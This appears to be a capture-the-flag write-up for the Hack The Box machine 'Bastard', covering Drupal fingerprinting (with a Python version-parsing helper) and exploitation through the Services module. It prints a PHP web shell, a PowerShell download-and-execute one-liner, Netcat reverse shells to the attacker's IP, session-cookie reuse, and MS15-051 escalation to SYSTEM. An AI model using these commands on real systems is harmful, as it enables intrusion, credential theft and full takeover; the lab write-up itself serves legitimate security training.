Bastard

This is the write-up for the box Bastard, which was retired on 16 September 2017. My IP address was 10.10.14.23 while I did this.

Let's put this in our hosts file:

10.10.10.9    bastard.htb

Enumeration

Starting with a Nmap scan:

nmap -sC -sV -oN nmap/bastard.nmap 10.10.10.9
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Checking HTTP (Port 80)

As the web server is IIS 7.5, which ships with Windows Server 2008 R2 (and Windows 7), the OS of the box is most likely Windows Server 2008 R2.

The web page is a Drupal installation (the http-generator header already told us it is Drupal 7). One of the default files of Drupal is /CHANGELOG.txt, which robots.txt even points us to; its first entry tells us the exact version. Here it is 7.54, released on February 1st 2017.
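The fingerprinting step above boils down to parsing two sources: the generator header, which only gives the major version, and CHANGELOG.txt, which gives the exact release. The following is an added example (not part of the original write-up or of any Drupal code) that parses a constructed excerpt in the layout Drupal 7 uses for CHANGELOG.txt and cross-checks it against the generator value, because a leftover CHANGELOG.txt from an older tree would otherwise give a wrong version; the sample changelog entries and the 7.53 date are constructed for illustration.

```python
import re

# Constructed excerpt in the layout Drupal 7 uses for /CHANGELOG.txt: the newest
# release comes first, each release has a "Drupal <version>, <YYYY-MM-DD>" header
# followed by a dashed underline and its change list. The entries below are
# placeholders, not the real file's contents.
SAMPLE_CHANGELOG = """\

Drupal 7.54, 2017-02-01
-----------------------
- (constructed placeholder for the 7.54 change list)

Drupal 7.53, 2016-12-07
-----------------------
- (constructed placeholder for the 7.53 change list)
"""

# One release header per line; accepts "7.54", "8.0.1" and tags like "7.0-beta1".
RELEASE_RE = re.compile(
    r"^Drupal (\d+(?:\.\d+)+(?:-[a-z0-9]+)?), (\d{4}-\d{2}-\d{2})\s*$", re.M)


def parse_changelog(text):
    """Return [(version, release_date), ...] in file order, newest first."""
    return RELEASE_RE.findall(text)


def installed_version(text):
    """The first header is the release the tree was last upgraded to (or None)."""
    releases = parse_changelog(text)
    return releases[0] if releases else None


def major_from_generator(generator):
    """Parse the X-Generator header / <meta name="generator"> value, e.g.
    'Drupal 7 (http://drupal.org)'. Drupal only exposes the major version there."""
    m = re.search(r"\bDrupal\s+(\d+)", generator or "")
    return int(m.group(1)) if m else None


def fingerprint(generator, changelog_text):
    """Combine both sources. CHANGELOG.txt can be stale (left over from an older
    tree or copied in by hand), so the exact version is only marked consistent
    when its major matches the one the application itself reports."""
    major = major_from_generator(generator)
    exact = installed_version(changelog_text)
    if exact is None:
        return {"major": major, "version": None, "released": None, "consistent": None}
    version, released = exact
    changelog_major = int(version.split(".")[0])
    return {
        "major": major,
        "version": version,
        "released": released,
        "consistent": None if major is None else major == changelog_major,
    }


if __name__ == "__main__":
    # On a live target: fetch /CHANGELOG.txt and read the X-Generator header
    # (or the generator meta tag), then feed both values in here.
    print(fingerprint("Drupal 7 (http://drupal.org)", SAMPLE_CHANGELOG))
```

Against a live box, fetch /CHANGELOG.txt with any HTTP client and pass its text together with the X-Generator header value; a `consistent` of `False` means the changelog does not belong to the running code and should not be trusted for exploit selection.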

Looking for exploits for this:

searchsploit drupal 7

The exploit to use is "Drupal 7.x Module Services - Remote Code Execution": the Services module's REST endpoint unserialize()s attacker-controlled request data (PHP object injection), which the public exploit chains into reading the database (it dumps the admin user and session) and writing an arbitrary file. We change a few lines to set the target and to drop a file that gives us command execution and file upload:

# (...)
$url = 'http://10.10.10.9/';   # target; the trailing slash shows up later as a double slash in the printed URL
$endpoint_path = '/rest';       # path of the Services REST endpoint on the target
$endpoint = 'rest_endpoint';    # machine name of that endpoint

# PHP dropped into the web root: "upload" fetches a file from our HTTP server
# (started with python -m http.server 8000 in the payload directory) and stores
# it next to the script; "exec" runs a command and returns its output.
$phpCode = <<<'EOD'
<?php
if (isset($_REQUEST['upload'])) {
        file_put_contents($_REQUEST['upload'], file_get_contents("http://10.10.14.23:8000/" . $_REQUEST['upload']));
}
if (isset($_REQUEST['exec'])) {
        echo "<pre>" . shell_exec($_REQUEST['exec']) . "</pre>";
}
?>
EOD;

$file = [
    'filename' => 'exploit.php',
    'data' => $phpCode
];
# (...)

Run the exploit:

php5 drupal_exploit.php
# Output
#!/usr/bin/php
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries
File written: http://10.10.10.9//exploit.php

Browsing to the dropped file (the double slash in the printed URL is just the trailing slash of $url joined to the filename; IIS resolves it) we can test whether we have command execution:

http://10.10.10.9/exploit.php?exec=whoami

It outputs that we are NT Authority\iusr, the anonymous IIS account.

Besides command execution we could also log in through the web interface: session.json holds the admin's session cookie values that the exploit pulled from the database, and replacing our cookies with them logs us in as the Drupal admin without knowing the password:

[Screenshot: Drupal admin page]

Command Execution on HTTP

We should run some enumeration script on this box to get a picture of the attack surface. I will run PowerUp.ps1 from the PowerSploit framework first.

Download the file from my local machine and run it:

.../exploit.php?exec=echo IEX(New-Object Net.WebClient).downloadString('http://10.10.14.23:8000/PowerUp.ps1') | powershell -noprofile -

Unfortunately there is nothing interesting in this output (note that PowerUp.ps1 only defines functions; the checks themselves run from Invoke-AllChecks, so that call has to be appended to the served script or to the piped one-liner), so let's run another enumeration script. I will run Sherlock, which compares the installed patches against a list of known local privilege escalation bugs, to get suggestions for exploits.

We want to upload Netcat for Windows on this box and execute it to get a reverse shell:

/exploit.php?upload=nc64.exe&exec=nc64.exe -e cmd 10.10.14.23 9001

After sending this request the listener on port 9001 receives a reverse shell. The HTTP request itself hangs, because shell_exec() waits for nc64.exe to exit; that is expected.

Privilege Escalation

The enumeration script suggested several exploits; I will use MS15-051, the Win32k local privilege escalation also known as CVE-2015-1701, which affects Windows versions up to 8.1 / Server 2012 R2 when the May 2015 patch is missing. A compiled proof of concept is available on GitHub: we download it to our local machine, upload it to the box through the web shell and run it, passing the command it should execute as SYSTEM as its argument.

/exploit.php?upload=ms15-051x64.exe&exec=ms15-051x64.exe whoami

This outputs NT Authority\SYSTEM, so the exploit works and we can use it to start a shell:

/exploit.php?upload=ms15-051x64.exe&exec=ms15-051x64.exe "nc64.exe -e cmd 10.10.14.23 9002"

After sending this request the listener on port 9002 receives a reverse shell as NT Authority\SYSTEM and the box is done!